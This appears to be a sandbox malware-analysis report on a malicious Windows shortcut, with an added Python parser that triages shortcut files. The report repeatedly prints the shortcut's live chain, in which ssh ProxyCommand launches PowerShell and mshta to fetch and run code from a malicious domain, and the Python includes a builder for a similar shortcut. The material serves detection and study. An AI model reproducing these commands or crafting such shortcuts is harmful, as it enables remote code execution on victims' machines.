
Windows Analysis Report
DypA6KbLrn.lnk

Overview

General Information

Sample name: DypA6KbLrn.lnk
(renamed because original name is a hash value)
Original sample name: 25e7cee7a15413a5171636165e0e0473.lnk
Analysis ID: 1582824
MD5: 25e7cee7a15413a5171636165e0e0473
SHA1: abace591e3418a1b64cc38f37851b7b4da7347cf
SHA256: 4ae7c304075927398c65e980aa93f181d18dcf52265f6acc82e530d46ffc7ba4
Tags: lnk, user-abuse_ch

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Machine Learning detection for sample
Sigma detected: Potentially Suspicious PowerShell Child Processes
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Lolbin Ssh.exe Use As Proxy
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • ssh.exe (PID: 7492 cmdline: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'ALC15Y7xI6iZdmshta https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd'.SubString(13, 57)" . MD5: C05426E6F6DFB30FB78FBA874A2FF7DC)
    • conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7556 cmdline: powershell powershell -Command 'ALC15Y7xI6iZdmshta https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd'.SubString(13, 57) MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7684 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://docu-signer.com/api/uz/0912545164/index.mp4" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • mshta.exe (PID: 7764 cmdline: "C:\Windows\system32\mshta.exe" https://docu-signer.com/api/uz/0912545164/index.mp4 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • svchost.exe (PID: 7920 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
No configs have been found
No yara matches

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\system32\mshta.exe" https://docu-signer.com/api/uz/0912545164/index.mp4, CommandLine: "C:\Windows\system32\mshta.exe" https://docu-signer.com/api/uz/0912545164/index.mp4, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://docu-signer.com/api/uz/0912545164/index.mp4", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7684, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://docu-signer.com/api/uz/0912545164/index.mp4, ProcessId: 7764, ProcessName: mshta.exe
Source: Process started | Author: frack113, Nasreddine Bencherchali | Data: Command: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'ALC15Y7xI6iZdmshta https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd'.SubString(13, 57)" ., CommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'ALC15Y7xI6iZdmshta https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd'.SubString(13, 57)" ., CommandLine|base64offset|contains: , Image: C:\Windows\System32\OpenSSH\ssh.exe, NewProcessName: C:\Windows\System32\OpenSSH\ssh.exe, OriginalFileName: C:\Windows\System32\OpenSSH\ssh.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'ALC15Y7xI6iZdmshta https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd'.SubString(13, 57)" ., ProcessId: 7492, ProcessName: ssh.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell powershell -Command 'ALC15Y7xI6iZdmshta https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd'.SubString(13, 57), CommandLine: powershell powershell -Command 'ALC15Y7xI6iZdmshta https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd'.SubString(13, 57), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'ALC15Y7xI6iZdmshta https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd'.SubString(13, 57)" ., ParentImage: C:\Windows\System32\OpenSSH\ssh.exe, ParentProcessId: 7492, ParentProcessName: ssh.exe, ProcessCommandLine: powershell powershell -Command 'ALC15Y7xI6iZdmshta https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd'.SubString(13, 57), ProcessId: 7556, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7920, ProcessName: svchost.exe
No Suricata rule has matched


AV Detection

Source: https://docu-signer.com/api/uz/0912545164/index.mp4 | Avira URL Cloud: Label: malware
Source: DypA6KbLrn.lnk | ReversingLabs: Detection: 31%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 94.6% probability
Source: DypA6KbLrn.lnk | Joe Sandbox ML: detected
Source: unknown | HTTPS traffic detected: 104.21.87.65:443 -> 192.168.2.7:49706 version: TLS 1.2
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected:
  GET /api/uz/0912545164/index.mp4 HTTP/1.1
  Accept: */*
  Accept-Language: en-CH
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: docu-signer.com
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /cdn-cgi/styles/cf.errors.css HTTP/1.1
  Accept: */*
  Referer: https://docu-signer.com/api/uz/0912545164/index.mp4
  Accept-Language: en-CH
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: docu-signer.com
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /cdn-cgi/images/icon-exclamation.png?1376755637 HTTP/1.1
  Accept: */*
  Referer: https://docu-signer.com/api/uz/0912545164/index.mp4
  Accept-Language: en-CH
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: docu-signer.com
  Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: docu-signer.com
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 403 Forbidden
  Date: Tue, 31 Dec 2024 14:41:49 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  X-Frame-Options: SAMEORIGIN
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lomOCgu9kEEfK2C8kSDEi6gRxd1TFMSDdFXSc4UQzFI2wrJ%2FZxWDFtDHWYselPQvATrwRrXkj0bUUpB6KuFKvbKIKJjcHSi6bWun2Un87ZwfPsKciNFGQXhfPcN3eiMm3w8%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8fab085da9a372b9-EWR
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706

System Summary

Source: DypA6KbLrn.lnk | LNK file: -o ProxyCommand="powershell powershell -Command 'ALC15Y7xI6iZdmshta https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd'.SubString(13, 57)" .
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: classification engine | Classification label: mal80.winLNK@9/11@1/2
Source: C:\Windows\System32\OpenSSH\ssh.exe | File created: C:\Users\user\.ssh
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_apgduuv1.a1z.ps1
Source: C:\Windows\System32\conhost.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\OpenSSH\ssh.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\OpenSSH\ssh.exe "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'ALC15Y7xI6iZdmshta https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd'.SubString(13, 57)" .
Source: C:\Windows\System32\OpenSSH\ssh.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\OpenSSH\ssh.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command 'ALC15Y7xI6iZdmshta https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd'.SubString(13, 57)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://docu-signer.com/api/uz/0912545164/index.mp4"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://docu-signer.com/api/uz/0912545164/index.mp4
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: libcrypto.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: napinsp.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: wshbth.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, amsi.dll, userenv.dll, profapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll
Source: C:\Windows\System32\mshta.exe
  Section loaded: wldp.dll (x2), mshtml.dll, iertutil.dll, sspicli.dll, powrprof.dll, winhttp.dll, wkscli.dll, netutils.dll, umpdc.dll, urlmon.dll, srvcli.dll, kernel.appcore.dll, msiso.dll, uxtheme.dll, srpapi.dll, wininet.dll, windows.storage.dll, profapi.dll, ondemandconnroutehelper.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, ieframe.dll, netapi32.dll, version.dll, userenv.dll, msimtf.dll, dxgi.dll, resourcepolicyclient.dll, dnsapi.dll, rasadhlp.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll (x2), ntmarta.dll, wintypes.dll (x3), dataexchange.dll, d3d11.dll, dcomp.dll, twinapi.appcore.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll, jscript9.dll, d2d1.dll, dwrite.dll, d3d10warp.dll, dxcore.dll, secur32.dll, mlang.dll, windowscodecs.dll, uianimation.dll
Source: C:\Windows\System32\svchost.exe
  Section loaded: kernel.appcore.dll, qmgr.dll, bitsperf.dll, powrprof.dll, xmllite.dll, firewallapi.dll, esent.dll, umpdc.dll, dnsapi.dll, iphlpapi.dll, fwbase.dll, wldp.dll, ntmarta.dll, profapi.dll, flightsettings.dll, policymanager.dll, msvcp110_win.dll, netprofm.dll, npmproxy.dll, bitsigd.dll, upnp.dll, winhttp.dll (x2), ssdpapi.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll (x2), appxdeploymentclient.dll, cryptbase.dll, wsmauto.dll, miutils.dll, wsmsvc.dll, dsrole.dll, pcwum.dll, mi.dll, userenv.dll, gpapi.dll, wkscli.dll, sspicli.dll, ondemandconnroutehelper.dll (x2), msv1_0.dll, ntlmshared.dll, cryptdll.dll, webio.dll, mswsock.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, rmclient.dll, usermgrcli.dll, execmodelclient.dll, propsys.dll, coremessaging.dll, twinapi.appcore.dll, onecorecommonproxystub.dll, execmodelproxy.dll, resourcepolicyclient.dll, vssapi.dll, vsstrace.dll, samcli.dll, samlib.dll, es.dll, bitsproxy.dll, dhcpcsvc6.dll, dhcpcsvc.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, dpapi.dll, mpr.dll
Source: C:\Windows\System32\mshta.exe
  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32 (CLSID_HTMLDocument, the MSHTML document object that mshta.exe hosts)
Source: DypA6KbLrn.lnk
  LNK file target (relative path): ..\..\..\..\..\..\..\Windows\System32\OpenSSH\ssh.exe
Source: C:\Windows\System32\mshta.exe
  Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder
  Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Code function: 4_2_00007FFAAC540327 pushad ; iretd 4_2_00007FFAAC540346
  Code function: 4_2_00007FFAAC54018D push ds; iretd 4_2_00007FFAAC5401B6
  Code function: 4_2_00007FFAAC540347 push esi; iretd 4_2_00007FFAAC540376
  Code function: 4_2_00007FFAAC5419BA pushad ; ret 4_2_00007FFAAC5419C9
  Code function: 4_2_00007FFAAC5400AD push ds; iretd 4_2_00007FFAAC5401B6
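The relative target path in the LNK file row above (`..\..\..\..\..\..\..\Windows\System32\OpenSSH\ssh.exe`) is the shortcut's RELATIVE_PATH string, which Explorer resolves from the .lnk's own directory; `..` components past the drive root are ignored, so the same shortcut reaches ssh.exe from any folder up to seven levels deep on the system drive. The Python below is an added example, not part of the Joe Sandbox report or its tooling: a minimal MS-SHLLINK parser that pulls the StringData fields out of a shortcut and triages the relative path the way an analyst would, plus a small writer used only to construct the sample .lnk inline. The relative path in the sample is the one from the report; the working directory, the argument string and the example.invalid URL are assumptions made up for illustration.

```python
"""Minimal MS-SHLLINK parser: extracts the StringData fields of a .lnk and
triages the relative target path. Added example, not report tooling."""
import struct

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

HEADER_SIZE = 0x4C
# {00021401-0000-0000-C000-000000000046}, the fixed LinkCLSID, as stored on disk
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# StringData fields appear in this fixed order when their flag is set
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

# Binaries an analyst does not expect a "document" shortcut to point at
LOLBINS = {"ssh.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
           "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe"}
# Interpreter names that, inside the argument string, mean a further stage is chained
NESTED_HOSTS = ("powershell", "mshta", "wscript", "cscript", "rundll32", "regsvr32")


def _read_string(data, off, unicode):
    """Read one StringData entry: 2-byte CountCharacters, then the characters."""
    (count,) = struct.unpack_from("<H", data, off)
    off += 2
    width = 2 if unicode else 1
    raw = data[off:off + count * width]
    return raw.decode("utf-16-le" if unicode else "cp1252"), off + count * width


def parse_lnk(data):
    """Return the StringData fields of a shell link, skipping IDList and LinkInfo."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a shell link: bad HeaderSize")
    if data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link: bad LinkCLSID")
    (flags,) = struct.unpack_from("<I", data, 20)
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:
        (id_list_size,) = struct.unpack_from("<H", data, off)
        off += 2 + id_list_size          # IDListSize does not count itself
    if flags & HAS_LINK_INFO:
        (link_info_size,) = struct.unpack_from("<I", data, off)
        off += link_info_size            # LinkInfoSize does count itself
    link = {"flags": flags}
    for flag, key in STRING_FIELDS:
        if flags & flag:
            link[key], off = _read_string(data, off, bool(flags & IS_UNICODE))
        else:
            link[key] = None
    return link


def climb_depth(path):
    """Number of '..' components in a relative path."""
    return sum(1 for seg in path.replace("/", "\\").split("\\") if seg == "..")


def assess(link):
    """Triage findings for a parsed link; an empty list means nothing stood out."""
    findings = []
    rel = link.get("relative_path") or ""
    target = rel.replace("/", "\\").split("\\")[-1].lower()
    depth = climb_depth(rel)
    if depth >= 3:
        findings.append(f"relative path climbs {depth} directories before reaching {target}")
    if target in LOLBINS:
        findings.append(f"target {target} is a living-off-the-land binary, not a document")
    args = (link.get("arguments") or "").lower()
    if "proxycommand" in args:
        findings.append("ssh ProxyCommand option present: ssh.exe will spawn the given command")
    nested = [h for h in NESTED_HOSTS if h in args]
    if nested:
        findings.append("arguments chain further interpreters: " + ", ".join(nested))
    return findings


def _pack_string(text):
    return struct.pack("<H", len(text)) + text.encode("utf-16-le")


def build_lnk(relative_path, working_dir=None, arguments=None):
    """Assemble a minimal Unicode .lnk carrying only the StringData fields given.
    Used here to construct sample input; it is not a general-purpose writer."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH
    body = _pack_string(relative_path)
    if working_dir is not None:
        flags |= HAS_WORKING_DIR
        body += _pack_string(working_dir)
    if arguments is not None:
        flags |= HAS_ARGUMENTS
        body += _pack_string(arguments)
    # HeaderSize, CLSID, flags, attrs, 3 timestamps, size, icon, SW_SHOWNORMAL, hotkey, reserved
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    return header + body


# Constructed samples: the relative target path is the one the report shows; the
# working directory, argument string and URL are invented for illustration.
SUSPICIOUS_LNK = build_lnk(
    r"..\..\..\..\..\..\..\Windows\System32\OpenSSH\ssh.exe",
    working_dir=r"C:\Windows\System32\OpenSSH",
    arguments='-o ProxyCommand="powershell -Command mshta https://example.invalid/stage2" .',
)
BENIGN_LNK = build_lnk(r"..\Documents\Q4-report.docx")

if __name__ == "__main__":
    for label, blob in (("suspicious", SUSPICIOUS_LNK), ("benign", BENIGN_LNK)):
        link = parse_lnk(blob)
        print(label, link["relative_path"], assess(link))
```

The parser deliberately skips the LinkTargetIDList and LinkInfo structures by their declared sizes, so it works on shortcuts that carry them as well as on the stripped sample; real triage should also decode the IDList, because an attacker can leave RELATIVE_PATH empty and encode the target there alone.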

Persistence and Installation Behavior

Source: LNK file
  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Process created: C:\Windows\System32\mshta.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
